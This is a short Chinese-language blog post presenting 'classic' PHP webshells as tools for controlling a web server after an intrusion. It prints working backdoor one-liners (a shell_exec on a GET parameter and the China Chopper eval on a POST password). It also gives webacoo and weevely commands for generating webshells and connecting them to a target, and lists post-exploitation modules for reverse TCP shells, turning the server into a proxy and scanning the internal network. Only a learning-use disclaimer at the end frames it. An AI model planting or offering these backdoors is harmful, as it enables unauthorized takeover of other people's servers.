几种好用的经典webshell(php)
webshell就是以网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
php经典一句话:
<?php echo shell_exec($_GET[‘cmd‘]);?>中国菜刀:
官网:www.maicaidao.co
原理:上传一句话(<?php @eval($_POST[‘我是密码‘]);?>)至服务器端,再用中国菜刀客户端(图形化界面)去连接服务器
webacoo(kali):
特点:传输的数据包裹在cookie中,并非http包体内,起到一定绕过作用
原理:生成webshell,上传至目标服务器,再拿webacoo去连接该webshell,返回可以执行系统命令的shell
缺点:不可设置专属连接密码
生成webshell: webacoo -g -o a.php
连接webshell: webacoo -t -u http://192.168.1.1/a.php
weevely(kali):
原理:生成webshell,上传至目标服务器,再拿weevely去连接该webshell,返回可以执行系统命令的shell
生成webshell:weevely generate 密码 a.php
连接webshell:weevely http://192.168.1.1/a.php 密码
特点:连接到目标服务器webshell后还可以调用内置的N多模块,在shell下输入help查看模块,直接在shell下输入模块名称使用模块
30多个管理模块举例:
1、执行系统命令、浏览文件系统
2、检查服务器常见配置错误
3、创建正向、反向TCP Shell连接
4、将目标服务器作为代理http服务器(肉鸡) ====>只需要在连接到的shell中输入net_proxy即可打开代理,此时会在本地监听127.0.0.1:8080,浏览器设置为该代理后所有流量将走目标服务器
5、从目标计算机运行端口扫描,渗透内网
本文内容仅供个人学习、研究或参考使用,不构成任何形式的决策建议、专业指导或法律依据。未经授权,禁止任何单位或个人以商业售卖、虚假宣传、侵权传播等非学习研究目的使用本文内容。如需分享或转载,请保留原文来源信息,不得篡改、删减内容或侵犯相关权益。感谢您的理解与支持!